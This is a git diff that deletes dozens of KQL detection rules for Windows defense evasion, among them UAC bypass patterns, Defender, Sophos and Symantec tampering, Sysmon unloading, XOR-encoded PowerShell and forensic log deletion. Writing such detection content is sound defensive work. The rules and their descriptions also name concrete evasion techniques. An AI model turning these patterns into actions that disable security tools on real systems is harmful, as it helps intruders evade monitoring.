-| where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql b/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql
deleted file mode 100644
index 68be0887..00000000
--- a/Defense Evasion/Suspicious_Workstation_Locking_via_Rundll32.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/06/04
-// Level: medium
-// Description: Detects a suspicious call to the user32.dll function that locks the user workstation
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql b/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql
deleted file mode 100644
index 508c2628..00000000
--- a/Defense Evasion/Suspicious_X509Enrollment_-_Process_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/12/23
-// Level: medium
-// Description: Detect use of X509Enrollment
-// Tags: attack.defense_evasion, attack.t1553.004
-DeviceProcessEvents
-| where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09"
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql b/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql
deleted file mode 100644
index f68123c0..00000000
--- a/Defense Evasion/Suspicious_XOR_Encoded_PowerShell_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali
-// Date: 2018/09/05
-// Level: medium
-// Description: Detects presence of a potentially xor encoded powershell command
-// Tags: attack.defense_evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6")
\ No newline at end of file
diff --git a/Defense Evasion/Suspicious_ZipExec_Execution.kql b/Defense Evasion/Suspicious_ZipExec_Execution.kql
deleted file mode 100644
index 59378b3b..00000000
--- a/Defense Evasion/Suspicious_ZipExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/11/07
-// Level: medium
-// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
-// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip")
\ No newline at end of file
diff --git a/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql b/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql
deleted file mode 100644
index b49c1f51..00000000
--- a/Defense Evasion/SyncAppvPublishingServer_Execute_Arbitrary_PowerShell_Code.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/12
-// Level: medium
-// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe.
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe")
\ No newline at end of file
diff --git a/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql b/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql
deleted file mode 100644
index 2b772b2e..00000000
--- a/Defense Evasion/SyncAppvPublishingServer_VBS_Execute_Arbitrary_PowerShell_Code.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/07/16
-// Level: medium
-// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs
-// Tags: attack.defense_evasion, attack.t1218, attack.t1216
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";"
\ No newline at end of file
diff --git a/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql b/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql
deleted file mode 100644
index 25f9908e..00000000
--- a/Defense Evasion/Sysinternals_PsSuspend_Suspicious_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/23
-// Level: high
-// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Sysmon_Configuration_Update.kql b/Defense Evasion/Sysmon_Configuration_Update.kql
deleted file mode 100644
index 1666200e..00000000
--- a/Defense Evasion/Sysmon_Configuration_Update.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/09
-// Level: medium
-// Description: Detects updates to Sysmon's configuration. Attackers might update or replace the Sysmon configuration with a bare bone one to avoid monitoring without shutting down the service completely
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "/c") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor")
\ No newline at end of file
diff --git a/Defense Evasion/Sysmon_Driver_Altitude_Change.kql b/Defense Evasion/Sysmon_Driver_Altitude_Change.kql
deleted file mode 100644
index 545223e7..00000000
--- a/Defense Evasion/Sysmon_Driver_Altitude_Change.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: B.Talebi
-// Date: 2022/07/28
-// Level: high
-// Description: Detects changes in Sysmon driver altitude value.
-If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryKey contains "\\Services" and RegistryKey endswith "\\Instances\\Sysmon Instance\\Altitude"
\ No newline at end of file
diff --git a/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql b/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql
deleted file mode 100644
index cd96d782..00000000
--- a/Defense Evasion/Sysmon_Driver_Unloaded_Via_Fltmc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kirill Kiryanov, oscd.community
-// Date: 2019/10/23
-// Level: high
-// Description: Detects possible Sysmon filter driver unloaded via fltmc.exe
-// Tags: attack.defense_evasion, attack.t1070, attack.t1562, attack.t1562.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "unload" and ProcessCommandLine contains "sysmon") and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")
\ No newline at end of file
diff --git a/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql b/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql
deleted file mode 100644
index 9eaee852..00000000
--- a/Defense Evasion/System_Control_Panel_Item_Loaded_From_Uncommon_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Anish Bogati
-// Date: 2024/01/09
-// Level: medium
-// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
-// Tags: attack.defense_evasion, attack.t1036
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/Defense Evasion/System_File_Execution_Location_Anomaly.kql b/Defense Evasion/System_File_Execution_Location_Anomaly.kql
deleted file mode 100644
index b5d45fc6..00000000
--- a/Defense Evasion/System_File_Execution_Location_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali
-// Date: 2017/11/27
-// Level: high
-// Description: Detects a Windows program executable started from a suspicious folder
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where (FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\dashost.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\atbroker.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\certreq.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\consent.exe" or FolderPath endswith "\\defrag.exe" or FolderPath endswith "\\dism.exe" or FolderPath endswith "\\dllhst3g.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\runonce.exe" or FolderPath endswith 
"\\winver.exe" or FolderPath endswith "\\logonui.exe" or FolderPath endswith "\\userinit.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\ntoskrnl.exe" or FolderPath endswith "\\wsmprovhost.exe" or FolderPath endswith "\\dfrgui.exe") and (not((((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\") or FolderPath contains "\\SystemRoot\\System32\\" or (FolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe"))) or (FolderPath endswith "\\wsl.exe" and FolderPath startswith "C:\\Program Files\\WindowsApps\\MicrosoftCorporationII.WindowsSubsystemForLinux"))))
\ No newline at end of file
diff --git a/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql b/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql
deleted file mode 100644
index a84c588e..00000000
--- a/Defense Evasion/Tamper_Windows_Defender_Remove-MpPreference.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Remove-MpPreference" and (ProcessCommandLine contains "-ControlledFolderAccessProtectedFolders " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Ids " or ProcessCommandLine contains "-AttackSurfaceReductionRules_Actions " or ProcessCommandLine contains "-CheckForSignaturesBeforeRunningScan ")
\ No newline at end of file
diff --git a/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql b/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql
deleted file mode 100644
index fcdeaa30..00000000
--- a/Defense Evasion/Tamper_With_Sophos_AV_Registry_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/02
-// Level: high
-// Description: Detects tamper attempts to sophos av functionality via registry key modification
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SAVEnabled" or RegistryKey contains "\\Sophos Endpoint Defense\\TamperProtection\\Config\\SEDEnabled" or RegistryKey contains "\\Sophos\\SAVService\\TamperProtection\\Enabled")
\ No newline at end of file
diff --git a/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql b/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql
deleted file mode 100644
index f8e74343..00000000
--- a/Defense Evasion/Taskkill_Symantec_Endpoint_Protection.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Ilya Krestinichev, Florian Roth (Nextron Systems)
-// Date: 2022/09/13
-// Level: high
-// Description: Detects one of the possible scenarios for disabling Symantec Endpoint Protection.
-Symantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.
-As a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.
-
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "taskkill" and ProcessCommandLine contains " /F " and ProcessCommandLine contains " /IM " and ProcessCommandLine contains "ccSvcHst.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql b/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql
deleted file mode 100644
index 1c869660..00000000
--- a/Defense Evasion/Taskmgr_as_LOCAL_SYSTEM.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/03/18
-// Level: high
-// Description: Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where FolderPath endswith "\\taskmgr.exe" and (AccountName contains "AUTHORI" or AccountName contains "AUTORI")
\ No newline at end of file
diff --git a/Defense Evasion/Tasks_Folder_Evasion.kql b/Defense Evasion/Tasks_Folder_Evasion.kql
deleted file mode 100644
index 057c6541..00000000
--- a/Defense Evasion/Tasks_Folder_Evasion.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Sreeman
-// Date: 2020/01/13
-// Level: high
-// Description: The Tasks folder in system32 and syswow64 are globally writable paths.
-Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
-in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
-
-// Tags: attack.defense_evasion, attack.persistence, attack.execution, attack.t1574.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "echo " or ProcessCommandLine contains "copy " or ProcessCommandLine contains "type " or ProcessCommandLine contains "file createnew") and (ProcessCommandLine contains " C:\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains " C:\\Windows\\SysWow64\\Tasks\\")
\ No newline at end of file
diff --git a/Defense Evasion/TeamViewer_Log_File_Deleted.kql b/Defense Evasion/TeamViewer_Log_File_Deleted.kql
deleted file mode 100644
index c78998d5..00000000
--- a/Defense Evasion/TeamViewer_Log_File_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/16
-// Level: low
-// Description: Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where (FolderPath contains "\\TeamViewer_" and FolderPath endswith ".log") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql b/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql
deleted file mode 100644
index 29fb1e22..00000000
--- a/Defense Evasion/Terminal_Server_Client_Connection_History_Cleared_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/10/19
-// Level: high
-// Description: Detects the deletion of registry keys containing the MSTSC connection history
-// Tags: attack.defense_evasion, attack.t1070, attack.t1112
-DeviceRegistryEvents
-| where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Servers")
\ No newline at end of file
diff --git a/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql b/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql
deleted file mode 100644
index 15cbb1e6..00000000
--- a/Defense Evasion/Third_Party_Software_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
-// Date: 2022/08/17
-// Level: medium
-// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql b/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql
deleted file mode 100644
index 676604a5..00000000
--- a/Defense Evasion/Time_Travel_Debugging_Utility_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\tttracer.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql b/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql
deleted file mode 100644
index 856e72cb..00000000
--- a/Defense Evasion/Time_Travel_Debugging_Utility_Usage_-_Image.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
-// Date: 2020/10/06
-// Level: high
-// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
-// Tags: attack.defense_evasion, attack.credential_access, attack.t1218, attack.t1003.001
-DeviceImageLoadEvents
-| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql b/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql
deleted file mode 100644
index 7d6b9bce..00000000
--- a/Defense Evasion/Tomcat_WebServer_Logs_Deleted.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/16
-// Level: medium
-// Description: Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence
-// Tags: attack.defense_evasion, attack.t1070
-DeviceFileEvents
-| where (FolderPath contains "catalina." or FolderPath contains "_access_log." or FolderPath contains "localhost.") and (FolderPath contains "\\Tomcat" and FolderPath contains "\\logs\\")
\ No newline at end of file
diff --git a/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql b/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql
deleted file mode 100644
index 5c5f14c7..00000000
--- a/Defense Evasion/Trust_Access_Disable_For_VBApplications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020/05/22
-// Level: high
-// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM"
\ No newline at end of file
diff --git a/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql b/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql
deleted file mode 100644
index b8536a1a..00000000
--- a/Defense Evasion/TrustedPath_UAC_Bypass_Pattern.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/27
-// Level: critical
-// Description: Detects indicators of a UAC bypass method by mocking directories
-// Tags: attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath contains "C:\\Windows \\System32\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
deleted file mode 100644
index 8d57f867..00000000
--- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where (FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe" or FolderPath endswith "\\AppData\\Local\\Temp\\system32\\winmm.dll") and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
deleted file mode 100644
index 503d8c5f..00000000
--- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessCommandLine contains "C:\\Windows \\system32\\winsat.exe" and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\system32\\winsat.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql b/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
deleted file mode 100644
index 979b06ac..00000000
--- a/Defense Evasion/UAC_Bypass_Abusing_Winsat_Path_Parsing_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceRegistryEvents
-| where RegistryValueData endswith "\\appdata\\local\\temp\\system32\\winsat.exe" and RegistryValueData startswith "c:\\users\\" and RegistryKey contains "\\Root\\InventoryApplicationFile\\winsat.exe|" and RegistryKey endswith "\\LowerCaseLongPath"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql b/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql
deleted file mode 100644
index ba29c60d..00000000
--- a/Defense Evasion/UAC_Bypass_Tools_Using_ComputerDefaults.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/31
-// Level: high
-// Description: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where (FolderPath =~ "C:\\Windows\\System32\\ComputerDefaults.exe" and (ProcessIntegrityLevel in~ ("High", "System"))) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32" or InitiatingProcessFolderPath contains ":\\Program Files")))
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql b/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
deleted file mode 100644
index f8815880..00000000
--- a/Defense Evasion/UAC_Bypass_Using_.NET_Code_Profiler_on_MMC.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\AppData\\Local\\Temp\\pe386.dll" and FolderPath startswith "C:\\Users\\"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql b/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql
deleted file mode 100644
index c912f517..00000000
--- a/Defense Evasion/UAC_Bypass_Using_ChangePK_and_SLUI.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "\\changepk.exe" and (ProcessIntegrityLevel in~ ("High", "System")) and InitiatingProcessFolderPath endswith "\\slui.exe"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql b/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
deleted file mode 100644
index c45c8dd3..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/23
-// Level: high
-// Description: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002
-DeviceFileEvents
-| where FolderPath endswith "\\comctl32.dll" and FolderPath startswith "C:\\Windows\\System32\\consent.exe.@"
\ No newline at end of file
diff --git a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql b/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
deleted file mode 100644
index b14f6498..00000000
--- a/Defense Evasion/UAC_Bypass_Using_Consent_and_Comctl32_-_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
